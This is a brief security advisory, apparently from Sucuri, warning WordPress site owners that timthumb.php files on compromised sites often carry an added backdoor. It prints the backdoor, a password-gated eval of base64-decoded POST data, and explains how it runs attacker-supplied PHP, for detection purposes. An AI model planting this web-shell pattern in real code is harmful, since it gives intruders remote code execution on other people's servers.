If your site got compromised lately with the TimThumb.php vulnerability, make sure to check that script to see if it was not modified to act as a backdoor as well.
We are seeing in many sites the timthumb.php with the following code added to it:
if (md5 (md5($_POST[‘p’]))===’xxx8ab2ab.. a4ec61072xxx’)
die (eval ( base64_decode ($_POST[‘c’])));
If you are not sure what this code does, it receives a password via the “p” POST and if it is correct, it executes any PHP code sent by the attackers in the “c” POST variable.
For more information about backdoors, we did a nice post about them: ASK Sucuri: What about the backdoors?
David Dede
Denis Sinegubko
Tony Perez
Daniel Cid